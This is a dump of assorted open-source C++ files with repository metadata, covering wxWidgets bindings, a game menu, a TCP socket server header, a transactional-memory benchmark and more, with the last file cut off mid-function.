] | permissive | erlang/otp | 7c6e88ca955bd6a3ede1530154c80e8ce449a370 | 334589af62a8db25a81afba2ecc50f33ff69ddb8 | refs/heads/master | 2023-08-30T23:37:28.061328 | 2023-08-30T04:20:48 | 2023-08-30T04:20:48 | 374,927 | 9,920 | 3,018 | Apache-2.0 | 2023-09-14T10:37:26 | 2009-11-16T17:17:57 | Erlang | UTF-8 | C++ | false | false | 2,798 | h | added_func.h | // Macro needed in erlang
class WXDLLIMPEXP_XRC wxXmlResource : public wxObject
{
public:
/**
Looks up a control.
Get a control with @a Name in a window created with XML
resources. You can use it to set/get values from controls.
The object is type casted to <b>Type</b>.
Example: <br />
@code
Xrc = wxXmlResource:get(),
Dlg = wxDialog:new(),
true = wxXmlResource:loadDialog(Xrc, Dlg, Frame, "controls_dialog"),
LCtrl = xrcctrl(Dlg, "controls_listctrl", wxListCtrl),
wxListCtrl:insertColumn(LCtrl, 0, "Name", [{width, 200}]),
@endcode
*/
static wxObject xrcctrl(wxWindow *Window, wxString Name, wxString Type);
};
// Enable test for valid wxTreeItemId's
class WXDLLIMPEXP_ADV wxTreeCtrlBase : public wxControl
{
public:
static bool IsTreeItemIdOk(wxTreeItemId id);
};
// The generator needs constructors (is this still valid?)
class WXDLLIMPEXP_ADV wxGridCellBoolRenderer : public wxGridCellRenderer
{
public:
wxGridCellBoolRenderer();
};
class WXDLLIMPEXP_ADV wxGridCellStringRenderer : public wxGridCellRenderer
{
public:
wxGridCellStringRenderer();
};
class wxMenuBar {
public:
// MacSpecific API
static void SetAutoWindowMenu( bool enable ) { s_macAutoWindowMenu = enable ; }
static bool GetAutoWindowMenu() { return s_macAutoWindowMenu ; }
};
// Deprecated functions in 3.1
class wxWindow {
public:
virtual void MakeModal(bool modal = true)
};
// wxListItemAttr Is typedef to wxItemAttr in 3.1
class wxListItemAttr {
public:
wxListItemAttr() { }
wxListItemAttr(const wxColour& colText,
const wxColour& colBack,
const wxFont& font)
: m_colText(colText), m_colBack(colBack), m_font(font)
{
}
// default copy ctor, assignment operator and dtor are ok
// setters
void SetTextColour(const wxColour& colText) { m_colText = colText; }
void SetBackgroundColour(const wxColour& colBack) { m_colBack = colBack; }
void SetFont(const wxFont& font) { m_font = font; }
// accessors
bool HasTextColour() const { return m_colText.Ok(); }
bool HasBackgroundColour() const { return m_colBack.Ok(); }
bool HasFont() const { return m_font.Ok(); }
const wxColour& GetTextColour() const { return m_colText; }
const wxColour& GetBackgroundColour() const { return m_colBack; }
const wxFont& GetFont() const { return m_font; }
};
class wxStyledTextEvent : public wxCommandEvent {
public:
bool GetDragAllowMove();
};
// No in api?
class wxAuiNotebookEvent : public wxBookCtrlEvent {
public:
void SetDragSource(wxAuiNotebook* s) { m_dragSource = s; }
wxAuiNotebook* GetDragSource() const { return m_dragSource; }
};
class wxGLCanvas : public wxWindow
{
public:
bool CreateSurface();
};
|
62701c56e9760549caa4637bccb6a5ab7b69375c | 33035c05aad9bca0b0cefd67529bdd70399a9e04 | /src/boost_mpl_list_aux__begin_end.hpp | c2b2304816e12ae445d4024b25cef1b52312783e | [
"LicenseRef-scancode-unknown-license-reference",
"BSL-1.0"
] | permissive | elvisbugs/BoostForArduino | 7e2427ded5fd030231918524f6a91554085a8e64 | b8c912bf671868e2182aa703ed34076c59acf474 | refs/heads/master | 2023-03-25T13:11:58.527671 | 2021-03-27T02:37:29 | 2021-03-27T02:37:29 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 45 | hpp | boost_mpl_list_aux__begin_end.hpp | #include <boost/mpl/list/aux_/begin_end.hpp>
|
de82f8461a77de5de8dd28aa7d06e68d80104c7c | 04ace79ef7785a3bb7bcfc597791eb51bb14dcc7 | /week-06/day-2/8/main.cpp | 004f1be8cc824b977a0cc9d73c3e8c58fc847809 | [] | no_license | green-fox-academy/NaArmin | 089cc301f3865c0af2d0b8f0163e03ecf97f2748 | 15e94f542cffc88634f59cf303a21cad0bc69a3f | refs/heads/master | 2021-09-07T12:02:18.442501 | 2018-02-22T15:03:49 | 2018-02-22T15:03:49 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 210 | cpp | main.cpp | #include <iostream>
#include "Student.h"
using namespace std;
int main()
{
Student st;
st.add_grade(3);
st.add_grade(4);
st.add_grade(1);
cout << st.get_average() << endl;
return 0;
}
|
1f6635b6900eb3921b86d3d69fe59d69f14ea293 | 3e1c801efa0ccec9e018e35ed2720d9ff0b4f81f | /src/menu_extras/multiOptionMenu.cpp | 51c3b80e37d384367167281bf1003bc3339f1d17 | [
"MIT"
] | permissive | kayateia/feetoffury | 4f3304b8371ab4aefdde28b5a6fb926b1c0342c6 | b3613c11dfdc8b287bd55f3b10dea70306de6261 | refs/heads/master | 2020-03-31T04:26:02.393040 | 2018-10-07T04:07:26 | 2018-10-07T04:07:26 | 151,904,873 | 9 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 2,253 | cpp | multiOptionMenu.cpp | /*
Feet of Fury
menu_extras/multiOptionMenu.cc
Copyright (C)2003 Cryptic Allusion, LLC
*/
#include "global.h"
#include "menu_extras.h"
#include "multiOptionMenu.h"
#include "option.h"
#include "selbar.h"
MultiOptionMenu::MultiOptionMenu(MenuExtras * parent)
: ExtrasMenu(parent)
{
m_title = new Label(m_parent->getFont(), "Title", 36, true, false);
m_title->setTranslate(Vector(320.0f, 60.0f, 15.0f));
subAdd(m_title);
m_sel = new SelBar(560.0f, 26.0f, 4.0f);
m_sel->setTint(Color(1.0f, 1.0f, 0.0f));
m_sel->setTranslate(Vector(320.0f, 140.0f, 1.0f));
subAdd(m_sel);
m_opts = NULL;
m_optCount = 0;
m_curOpt = 0;
}
MultiOptionMenu::~MultiOptionMenu() {
if (m_opts)
delete[] m_opts;
}
void MultiOptionMenu::inputEvent(const GenericMenu::Event & evt) {
if (evt.type != GenericMenu::Event::EvtKeypress)
return;
switch (evt.key) {
case GenericMenu::Event::KeyCancel:
if (m_backOpt) {
GenericMenu::Event mevt = evt;
mevt.key = GenericMenu::Event::KeySelect;
m_backOpt->inputEvent(mevt);
}
break;
case GenericMenu::Event::KeyUp:
m_curOpt--;
if (m_curOpt < 0)
m_curOpt += m_optCount;
m_parent->sfxCursor();
break;
case GenericMenu::Event::KeyDown:
m_curOpt++;
if (m_curOpt >= m_optCount)
m_curOpt -= m_optCount;
m_parent->sfxCursor();
break;
default:
m_opts[m_curOpt]->inputEvent(evt);
break;
}
Vector p = m_sel->getTranslate();
p.y = m_curOpt * 30.0f + 140.0f;
m_sel->setTranslate(p);
}
void MultiOptionMenu::setTitle(const char * title) {
m_title->setText(title);
}
void MultiOptionMenu::setOptionCount(int cnt) {
if (m_opts)
delete[] m_opts;
m_optCount = cnt;
m_opts = new RefPtr<Option>[cnt];
}
void MultiOptionMenu::setOption(int idx, Option * opt, bool backOption) {
assert( idx < m_optCount );
assert( opt != NULL );
if (m_opts[idx])
subRemove(m_opts[idx]);
m_opts[idx] = opt;
opt->setTranslate(Vector(0.0f, 140.0f + idx * 30, 5.0f));
subAdd(opt);
if (backOption)
m_backOpt = opt;
}
int MultiOptionMenu::getOptionCount() const {
return m_optCount;
}
Option * MultiOptionMenu::getOption(int idx) const {
return m_opts[idx];
}
void MultiOptionMenu::rescanUnlock() {
for (int i=0; i<m_optCount; i++) {
m_opts[i]->rescanUnlock();
}
}
|
aab00524f5b858e2b86688d6fd59950c82f59c4d | 65987a3251e26302d23396be2a14c8730caf9f6c | /ZROI/369.cpp | 02ae3301b642716b6c228c4ce9768cc71db10d7d | [] | no_license | wuyuhang422/My-OI-Code | 9608bca023fa2e4506b2d3dc1ede9a2c7487a376 | f61181cc64fafc46711ef0e85522e77829b04b37 | refs/heads/master | 2021-06-16T08:15:52.203672 | 2021-02-01T05:16:41 | 2021-02-01T05:16:41 | 135,901,492 | 5 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,079 | cpp | 369.cpp | #include <algorithm>
#include <iostream>
#include <cstring>
#include <climits>
#include <cstdlib>
#include <cstdio>
#include <vector>
#include <cmath>
#include <ctime>
#include <queue>
#include <stack>
#include <map>
#include <set>
#define fi first
#define se second
#define U unsigned
#define P std::pair
#define Re register
#define LL long long
#define pb push_back
#define MP std::make_pair
#define all(x) x.begin(),x.end()
#define CLR(i,a) memset(i,a,sizeof(i))
#define FOR(i,a,b) for(Re int i = a;i <= b;++i)
#define ROF(i,a,b) for(Re int i = a;i >= b;--i)
#define DEBUG(x) std::cerr << #x << '=' << x << std::endl
const int MAXN = 1e5 + 5;
std::map<int,int> S;
int n,a[MAXN];
struct BIT{
#define lowbit(x) ((x)&(-x))
int tree[3*MAXN];
inline void clear(){
CLR(tree,0);
}
inline void add(int pos,int x){
while(pos <= MAXN){
tree[pos] += x;
pos += lowbit(pos);
}
}
inline int calc(int pos){
int res = 0;
while(pos){
res += tree[pos];
pos -= lowbit(pos);
}
return res;
}
}bit;
int lu[MAXN],ld[MAXN],ru[MAXN],rd[MAXN];
int cnt1[MAXN],cnt2[MAXN];
// l:left r:right
// u:up d:down
int main(){
scanf("%d",&n);
FOR(i,1,n) scanf("%d",a+i),S.insert(MP(a[i],0));
int sz = 0;
for(std::map<int,int>::iterator it = S.begin();it != S.end();++it)
it->second = ++sz;
FOR(i,1,n) a[i] = S[a[i]];
FOR(i,1,n){
lu[i] = bit.calc(a[i]-1);
ld[i] = i-1-lu[i]-cnt1[a[i]];cnt1[a[i]]++;
bit.add(a[i],1);
}
bit.clear();
ROF(i,n,1){
ru[i] = bit.calc(a[i]-1);
rd[i] = n-i-ru[i]-cnt2[a[i]];cnt2[a[i]]++;
bit.add(a[i],1);
}
LL sum1 = 0ll,sum2 = 0ll;
FOR(i,1,n) sum1 += ru[i],sum2 += rd[i];
LL ans = 1ll*sum1*sum2;
FOR(i,1,n) ans -= 1ll*ru[i]*rd[i]; // a = c
FOR(i,1,n) ans -= 1ll*ru[i]*lu[i]; // a = d
FOR(i,1,n) ans -= 1ll*ld[i]*rd[i]; // b = c
FOR(i,1,n) ans -= 1ll*ld[i]*lu[i]; // b = d
printf("%lld\n",ans);
return 0;
}
|
0aeb2e851faec24713db7d5b28faa41592750ab3 | 536ab47e5ce1a3bd2bf8e6afabf7549457637b46 | /printRPM.cpp | 3af6f2e621ff5363654164f63a437bfd3ce9e714 | [
"Apache-2.0"
] | permissive | EvelynAnyebe/neato-xv11-lidar | b5ec438f0bbc82520f4517169b484aad18ca9420 | 884c3de405720a9f05b1776adcc14e1845ab99b5 | refs/heads/master | 2023-06-09T15:02:28.685900 | 2021-06-29T08:58:05 | 2021-06-29T08:58:05 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 317 | cpp | printRPM.cpp | #include "xv11.h"
int main(int, char **) {
Xv11 xv11;
xv11.start();
fprintf(stderr,"PWM range = %d\n",xv11.getPWMrange());
for(int i = 0; i<200; i++) {
printf("%f\n",xv11.getRPM());
fprintf(stderr,">");
std::this_thread::sleep_for(std::chrono::milliseconds(100));
}
xv11.stop();
fprintf(stderr,"\n");
}
|
3a49592506fa47f3c1be8bf8d109ed85a6991bb5 | a12a775abc346582f26d82e4b3f09dce0534de8e | /ucore/ucore/package/config/qconf.cc | dfd1f5c21cfd5e96b80b849ecb2c399f0954651b | [] | no_license | XinYao1994/Jos-mips | f595bcfc143fe1cf9bfb8e2112ccb9b4821ee0f2 | 839ce33cfaa32d0798f16f96e05e1b1397ba410a | refs/heads/master | 2021-01-10T14:35:59.152517 | 2016-03-23T04:00:33 | 2016-03-23T04:00:33 | 53,818,495 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 130 | cc | qconf.cc | version https://git-lfs.github.com/spec/v1
oid sha256:931d990f00e8c9b58b24d7c992c4ed6358759a6baad0d6f950a85b46076668ae
size 42831
|
4f988a7a2c78b0a46ed0fa0c0b6ff74f47826a4b | f06630352a79b74d250b1f34b3ea8720571ad58e | /src/petra/dev/src/OneFile/graphs/BenchmarkSPS.hpp | 4c2d79c3bd183e18b0a9077f4bc01b24520d5f08 | [
"MIT"
] | permissive | CLPeterson/DurableCorrectness | b57f3d28ce4cdb932506964b40b06bdb39ba843a | 5e3ae0c09f6ac9415850ae389672c50cb743262d | refs/heads/master | 2023-01-28T10:55:23.083481 | 2020-09-22T13:30:34 | 2020-09-22T13:30:34 | 285,900,349 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 10,883 | hpp | BenchmarkSPS.hpp | /*
* Copyright 2017-2018
* Andreia Correia <andreia.veiga@unine.ch>
* Pedro Ramalhete <pramalhe@gmail.com>
* Pascal Felber <pascal.felber@unine.ch>
* Nachshon Cohen <nachshonc@gmail.com>
*
* This work is published under the MIT license. See LICENSE.txt
*/
#ifndef _BENCHMARK_SPS_H_
#define _BENCHMARK_SPS_H_
#include <atomic>
#include <chrono>
#include <thread>
#include <string>
#include <vector>
#include <algorithm>
#include <cassert>
#include <iostream>
#include <typeinfo>
static const long arraySize = 1000; // 1k or 1M entries in the SPS array
using namespace std;
using namespace chrono;
/**
* This is a micro-benchmark
*/
class BenchmarkSPS {
private:
int numThreads;
public:
struct UserData {
long long seq;
int tid;
UserData(long long lseq, int ltid) {
this->seq = lseq;
this->tid = ltid;
}
UserData() {
this->seq = -2;
this->tid = -2;
}
UserData(const UserData &other) : seq(other.seq), tid(other.tid) { }
bool operator < (const UserData& other) const {
return seq < other.seq;
}
};
BenchmarkSPS(int numThreads) {
this->numThreads = numThreads;
}
/*
* An array of integers that gets randomly permutated.
*/
template<typename TM, template<typename> class TMTYPE>
uint64_t benchmarkSPSInteger(std::string& className, const seconds testLengthSeconds, const long numSwapsPerTx, const int numRuns) {
long long ops[numThreads][numRuns];
long long lengthSec[numRuns];
atomic<bool> startFlag = { false };
atomic<bool> quit = { false };
className = TM::className();
cout << "##### " << TM::className() << " ##### \n";
// Create the array of integers and initialize it
TMTYPE<uint64_t>* parray;
// It's ok to capture by reference, we're running single-threaded now
TM::updateTx([&] () {
parray = new TMTYPE<uint64_t>[arraySize];
//parray = (TMTYPE<uint64_t>*)TM::tmMalloc(sizeof(TMTYPE<uint64_t>)*arraySize);
} );
// Break up the initialization into transactions of 1k stores, so it fits in the log
for (long j = 0; j < arraySize; j+=1000) {
TM::updateTx([&] () {
for (int i = 0; i < 1000 && i+j < arraySize; i++) parray[i+j] = i+j;
} );
}
auto func = [this,&startFlag,&quit,&numSwapsPerTx,&parray](long long *ops, const int tid) {
uint64_t seed = tid+1234567890123456781ULL;
// Spin until the startFlag is set
while (!startFlag.load()) {}
// Do transactions until the quit flag is set
long long tcount = 0;
while (!quit.load()) {
TM::updateTx([&] () {
for (int i = 0; i < numSwapsPerTx; i++) {
seed = randomLong(seed);
auto ia = seed%arraySize;
uint64_t tmp = parray[ia];
seed = randomLong(seed);
auto ib = seed%arraySize;
parray[ia] = parray[ib];
parray[ib] = tmp;
}
} );
++tcount;
/*
PE::read_transaction([this,&seed,&parray,&numWordsPerTransaction] () {
PersistentArrayInt<persist>* read_array = PE::template get_object<PersistentArrayInt<persist>>(PIDX_INT_ARRAY);
// Check that the array is consistent
int sum = 0;
for (int i = 0; i < arraySize; i++) {
sum += read_array->counters[i];
}
assert(sum == 0);
} );
*/
}
*ops = tcount;
};
for (int irun = 0; irun < numRuns; irun++) {
if (irun == 0) className = TM::className();
thread enqdeqThreads[numThreads];
for (int tid = 0; tid < numThreads; tid++) enqdeqThreads[tid] = thread(func, &ops[tid][irun], tid);
auto startBeats = steady_clock::now();
startFlag.store(true);
// Sleep for 20 seconds
this_thread::sleep_for(testLengthSeconds);
quit.store(true);
auto stopBeats = steady_clock::now();
for (int tid = 0; tid < numThreads; tid++) enqdeqThreads[tid].join();
lengthSec[irun] = (stopBeats-startBeats).count();
startFlag.store(false);
quit.store(false);
}
// It's ok to capture by reference, we're running single-threaded now
TM::updateTx([&] () {
delete[] parray;
//TM::tmFree(parray);
});
// Accounting
vector<long long> agg(numRuns);
for (int irun = 0; irun < numRuns; irun++) {
for(int i=0;i<numThreads;i++){
agg[irun] += ops[i][irun]*1000000000LL/lengthSec[irun];
}
}
// Compute the median. numRuns should be an odd number
sort(agg.begin(),agg.end());
auto maxops = agg[numRuns-1];
auto minops = agg[0];
auto medianops = agg[numRuns/2];
auto delta = (long)(100.*(maxops-minops) / ((double)medianops));
// Printed value is the median of the number of ops per second that all threads were able to accomplish (on average)
std::cout << "Swaps/sec = " << medianops*numSwapsPerTx << " delta = " << delta*numSwapsPerTx << "% min = " << minops*numSwapsPerTx << " max = " << maxops*numSwapsPerTx << "\n";
return medianops*numSwapsPerTx;
}
/*
* An array of objects that gets randomly permutated.
*/
template<typename TM, template<typename> class TMTYPE, typename TMBASE>
uint64_t benchmarkSPSObject(std::string& className, const seconds testLengthSeconds, const long numSwapsPerTx, const int numRuns) {
long long ops[numThreads][numRuns];
long long lengthSec[numRuns];
atomic<bool> startFlag = { false };
atomic<bool> quit = { false };
struct MyObject : public TMBASE {
uint64_t a {0}; // For the OneFile STMs these don't need to be tmtypes because they're immutable after visible in this benchmark
uint64_t b {0};
MyObject(uint64_t a0, uint64_t b0) {
a = a0;
b = b0;
}
MyObject(const MyObject &other) {
a = other.a;
b = other.b;
}
};
// Create the array of integers and initialize it
TMTYPE<MyObject*>* parray;
parray = new TMTYPE<MyObject*>[arraySize];
// Break up the initialization into transactions of 1k stores, so it fits in the log
for (long j = 0; j < arraySize; j+=1000) {
TM::updateTx([&] () {
for (int i = 0; i < 1000 && i+j < arraySize; i++) parray[i+j] = TM::template tmNew<MyObject>((uint64_t)i+j,(uint64_t)i);
} );
}
/*
TM::updateTx([&] () {
for (int i = 0; i < arraySize; i++) parray[i] = TM::template tmNew<MyObject>((uint64_t)i,(uint64_t)i);
} );
*/
auto func = [this,&startFlag,&quit,&numSwapsPerTx,&parray](long long *ops, const int tid) {
uint64_t seed = tid+1234567890123456781ULL;
// Spin until the startFlag is set
while (!startFlag.load()) {}
// Do transactions until the quit flag is set
long long tcount = 0;
while (!quit.load()) {
TM::updateTx([&] () {
for (int i = 0; i < numSwapsPerTx; i++) {
seed = randomLong(seed);
auto ia = seed%arraySize;
// Create a new object with the same contents to replace the old object, at a random location
MyObject* tmp = TM::template tmNew<MyObject>(*parray[ia]);
TM::template tmDelete<MyObject>(parray[ia]);
parray[ia] = tmp;
}
} );
++tcount;
}
*ops = tcount;
};
for (int irun = 0; irun < numRuns; irun++) {
if (irun == 0) {
className = TM::className();
cout << "##### " << TM::className() << " ##### \n";
}
thread enqdeqThreads[numThreads];
for (int tid = 0; tid < numThreads; tid++) enqdeqThreads[tid] = thread(func, &ops[tid][irun], tid);
auto startBeats = steady_clock::now();
startFlag.store(true);
// Sleep for 20 seconds
this_thread::sleep_for(testLengthSeconds);
quit.store(true);
auto stopBeats = steady_clock::now();
for (int tid = 0; tid < numThreads; tid++) enqdeqThreads[tid].join();
lengthSec[irun] = (stopBeats-startBeats).count();
startFlag.store(false);
quit.store(false);
}
TM::updateTx([&] () {
for (int i = 0; i < arraySize; i++) TM::template tmDelete<MyObject>(parray[i]);
});
delete[] parray;
// Accounting
vector<long long> agg(numRuns);
for (int irun = 0; irun < numRuns; irun++) {
for(int i=0;i<numThreads;i++){
agg[irun] += ops[i][irun]*1000000000LL/lengthSec[irun];
}
}
// Compute the median. numRuns should be an odd number
sort(agg.begin(),agg.end());
auto maxops = agg[numRuns-1];
auto minops = agg[0];
auto medianops = agg[numRuns/2];
auto delta = (long)(100.*(maxops-minops) / ((double)medianops));
// Printed value is the median of the number of ops per second that all threads were able to accomplish (on average)
std::cout << "Swaps/sec = " << medianops*numSwapsPerTx << " delta = " << delta*numSwapsPerTx << "% min = " << minops*numSwapsPerTx << " max = " << maxops*numSwapsPerTx << "\n";
return medianops*numSwapsPerTx;
}
/**
* An imprecise but fast random number generator
*/
uint64_t randomLong(uint64_t x) {
x ^= x >> 12; // a
x ^= x << 25; // b
x ^= x >> 27; // c
return x * 2685821657736338717LL;
}
};
#endif
|
57fc884fdd4b7174cd8bfb2fa0a1d88867b139be | 48f71cc36854c8e3f3ea57aba2a38646a8d63004 | /shirabeengine/shirabe_resource_compiler/code/include/textures/definition.h | a29af63aff749d7e078a36a3ce7e9e4669268528 | [
"MIT"
] | permissive | Fraaanzi/ShirabeEngine | 10b6a5bb736432e3fd22b8d32324fd2b6b0396b2 | 39b3aa2c5173084d59b96b7f60c15207bff0ad04 | refs/heads/master | 2020-12-07T23:45:58.001712 | 2019-12-30T21:32:24 | 2019-12-30T21:32:24 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 373 | h | definition.h | #ifndef _SHIRABE_RESOURCECOMP_TEXTURE_DEFINITION_H_
#define _SHIRABE_RESOURCECOMP_TEXTURE_DEFINITION_H_
#include <string>
#include <vector>
#include <base/declaration.h>
#include <base/string.h>
#include <log/log.h>
#include "common/definition.h"
namespace texture
{
SHIRABE_DECLARE_LOG_TAG(TextureProcessor);
}
#endif // _SHIRABE_SHADERPRECOMP_DEFINITION_H_
|
a124fe922160bb27b2e00887b4e4e318c1da6d5f | 1fb0b6559816075a8386aa62492869bbcf4617f1 | /src/utils/inc/socket_server_tcp.h | f66759b0ea515896e9d72e61b63a4003fb3b4127 | [
"MIT"
] | permissive | lesongvi/brainflow | 28eeabb1d49521333a1432441b19920e45e5f33b | e10dc1e0d8016285967825170f8af1ebd768efb0 | refs/heads/master | 2021-06-23T05:09:40.820493 | 2021-04-23T12:58:53 | 2021-04-23T12:58:53 | 216,339,790 | 2 | 0 | MIT | 2021-04-23T12:58:54 | 2019-10-20T09:51:56 | null | UTF-8 | C++ | false | false | 1,216 | h | socket_server_tcp.h | #pragma once
#ifdef _WIN32
#include <ws2tcpip.h>
#else
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
#endif
#include <queue>
#include <stdlib.h>
#include <string.h>
#include <thread>
enum class SocketServerTCPReturnCodes : int
{
STATUS_OK = 0,
WSA_STARTUP_ERROR = 1,
CREATE_SOCKET_ERROR = 2,
CONNECT_ERROR = 3,
PTON_ERROR = 4
};
class SocketServerTCP
{
public:
SocketServerTCP (const char *local_ip, int local_port, bool recv_all_or_nothing);
~SocketServerTCP ()
{
close ();
}
int bind ();
int accept ();
int recv (void *data, int size);
void close ();
void accept_worker ();
volatile bool client_connected; // idea - stop accept blocking call by calling close in
// another thread
private:
char local_ip[80];
int local_port;
struct sockaddr_in server_addr;
volatile struct sockaddr_in client_addr;
std::queue<char> temp_buffer;
bool recv_all_or_nothing;
std::thread accept_thread;
#ifdef _WIN32
volatile SOCKET server_socket;
volatile SOCKET connected_socket;
#else
volatile int server_socket;
volatile int connected_socket;
#endif
};
|
53d426f3cad236c7ad4d53dbcec0c1bc2aceed36 | 8fd97c8310d59bf1ce9487e42dbf5395d4412345 | /source/game_utils/misc/tests/sdlkeytostring_test.cpp | 6f334b0c831065f0b9708559fd88cab9c4b044a9 | [
"Zlib"
] | permissive | gummikana/poro | 37c5dba0c11412e8ccdde5b4f5e949864c1e6e74 | 70162aca06ca5a1d4f92b8d01728e1764e4c6873 | refs/heads/master | 2023-06-22T17:48:43.103700 | 2019-09-17T15:32:31 | 2019-09-17T15:32:31 | 1,170,509 | 9 | 5 | null | null | null | null | UTF-8 | C++ | false | false | 1,800 | cpp | sdlkeytostring_test.cpp | /***************************************************************************
*
* Copyright (c) 2003 - 2011 Petri Purho
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*
***************************************************************************/
#include "../sdlkeytostring.h"
#include "../../../utils/debug.h"
#ifdef CENG_TESTER_ENABLED
#include <sdl.h>
namespace test {
int TestSDLKeyToString()
{
test_assert( SDLKeyToString( SDLK_BACKSPACE ) == "backspace" );
test_assert( SDLKeyToString( SDLK_UP ) == "up" );
test_assert( SDLKeyToString( SDLK_DOWN ) == "down" );
test_assert( SDLKeyToString( SDLK_LEFT ) == "left" );
test_assert( SDLKeyToString( SDLK_RIGHT) == "right" );
test_assert( SDLKeyToString( SDLK_w ) == "w" );
test_assert( SDLKeyToString( SDLK_s ) == "s" );
test_assert( SDLKeyToString( SDLK_d ) == "d" );
test_assert( SDLKeyToString( SDLK_a ) == "a" );
return 0;
}
TEST_REGISTER( TestSDLKeyToString );
} // end of namespace test
#endif |
5552734ec2dc094e796f7701b49e5f07347e4126 | cec0d28fdf99c4a4d006e4c215eeb509516ac122 | /Portfolio/CSC2402- Assignment 3/partA.cpp | 3c5350bd7fe46c6732f75aad5060dd0ebd6de217 | [] | no_license | camduncan-kemp/University-Portfolio | 5fd1b5d6bb78de36ffd17146c180ee132ce0f936 | ed5a021a415ac20ce588ebd320cda11fb51b7274 | refs/heads/master | 2020-08-03T05:58:39.175721 | 2019-09-29T10:46:11 | 2019-09-29T10:46:11 | 211,645,798 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,094 | cpp | partA.cpp | #include <iostream>
#include<iomanip>
#include <string>
#include <fstream>
using namespace std;
void recurseFunction(int input, int count, int largest, int original) //Recursive function, maintain original input for result output
{
if(input > largest) // Test for largest number reached
{
largest = input;
}
if (input == 1) //Output when number reaches 1
{
cout << "Starting with " << original << " it took " << count << " steps; The highest number achieved was " << largest << endl;
return;
}
if (input % 2 == 0) //Test for even number
{
input /= 2;
count++;
}
else //Run when not even/odd
{
input = input * 3 + 1;
count++;
}
recurseFunction(input, count, largest, original); //Function recursion
}
int main()
{
//Initialise variables
int count = 0;
int largest = 0;
int userInput;
cout << "Please input a test number: ";
cin >> userInput; // User Input
recurseFunction(userInput, count, largest, userInput);
return 0;
} |
c53c1c478b1c9c645d41d652515c594cc64d34db | 9d0b75314137125d6a7d6eddbe9436db99e1de8a | /src/frontend/GPProducerUtils.cpp | bfb88cfae2e25423aee3d93d2a5f719d95fdf056 | [
"Apache-2.0"
] | permissive | jxt1234/Renascence | 0c4cdcda5a94d450fa96017e723ce53e564296bc | c0a801e337a31de05f49047fd11920a3c2e32ed6 | refs/heads/master | 2021-01-17T09:49:49.444649 | 2016-12-29T08:04:36 | 2016-12-29T08:04:36 | 13,532,616 | 3 | 6 | null | 2015-12-07T06:54:35 | 2013-10-13T02:34:30 | C++ | UTF-8 | C++ | false | false | 5,812 | cpp | GPProducerUtils.cpp | /******************************************************************
Copyright 2015, Jiang Xiao-tang
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
******************************************************************/
#include <algorithm>
#include <map>
#include <set>
#include "frontend/GPProducerUtils.h"
#include "math/carryArray.h"
#include "math/carryGroup.h"
using namespace std;
static void _setUpBasicFunction(GPProducerUtils::func* dst, const GPFunction* src)
{
GPASSERT(dst->useChildrenInput.size() == src->inputType.size());
dst->inputs.clear();
dst->childrenInputs.clear();
for (int i=0; i<dst->useChildrenInput.size(); ++i)
{
if (0 == dst->useChildrenInput[i])
{
dst->inputs.push_back(src->inputType[i]);
}
else
{
dst->childrenInputs.push_back(src->inputType[i]);
}
}
dst->outputs = src->outputType;
dst->basic = src;
}
static bool _validFunctions(const vector<const GPFunction*>& functionList)
{
bool res = true;
return res;
}
GPProducerUtils::func GPProducerUtils::func::create(FUNC f, bool clear)
{
func res;
int usechild = clear ? 1 : 0;
res.useChildrenInput = vector<int>(f->inputType.size(), usechild);
_setUpBasicFunction(&res, f);
return res;
}
void GPProducerUtils::func::invalidate(func& f)
{
_setUpBasicFunction(&f, f.basic);
}
GPProducerUtils::GPProducerUtils(const GPFunctionDataBase* base)
{
mBase = base;
auto functions = base->getAllFunctions();
GPASSERT(_validFunctions(functions));
map<FUNC, vector<func*>> funcmap;
vector<GPPtr<func>> allfunctions;
/*Create basic function, expand functions*/
for (auto f : functions)
{
if (f->inputType.size()<=0)
{
GPPtr<func> mapfunc = new func;
mapfunc->useChildrenInput = vector<int>(f->inputType.size(), 0);
_setUpBasicFunction(mapfunc.get(), f);
allfunctions.push_back(mapfunc);
vector<func*> list(1, mapfunc.get());
funcmap.insert(make_pair(f, list));
continue;
}
carryGroup<int> group;
for (int i=0; i<f->inputType.size(); ++i)
{
if (f->inputType[i]->name() != "double" && f->inputType[i]->name() != "String")
{
group.mBase.push_back(std::vector<int>{0,1});
}
else
{
group.mBase.push_back(std::vector<int>{0});
}
}
vector<func*> list;
group.reset();
do
{
GPPtr<func> mapfunc = new func;
mapfunc->useChildrenInput = group.current();
_setUpBasicFunction(mapfunc.get(), f);
allfunctions.push_back(mapfunc);
list.push_back(mapfunc.get());
}while (group.next());
funcmap.insert(make_pair(f, list));
}
/*Assign Input, and filter invalid functions*/
mFunctions.clear();
for (auto f : allfunctions)
{
bool valid = true;
do
{
if (f->childrenInputs.size()<=0)
{
break;
}
GPASSERT(f->tables.empty());
carryGroup<const func*> group;
for (int i=0; i<f->childrenInputs.size(); ++i)
{
auto pairs = _getFunctionsForOutput(f->childrenInputs[i], allfunctions);
if (pairs.empty())
{
valid = false;
break;
}
group.mBase.push_back(pairs);
}
if (!valid)
{
break;
}
group.reset();
do
{
f->tables.push_back(group.current());
} while(group.next());
}while(0);
if (valid)
{
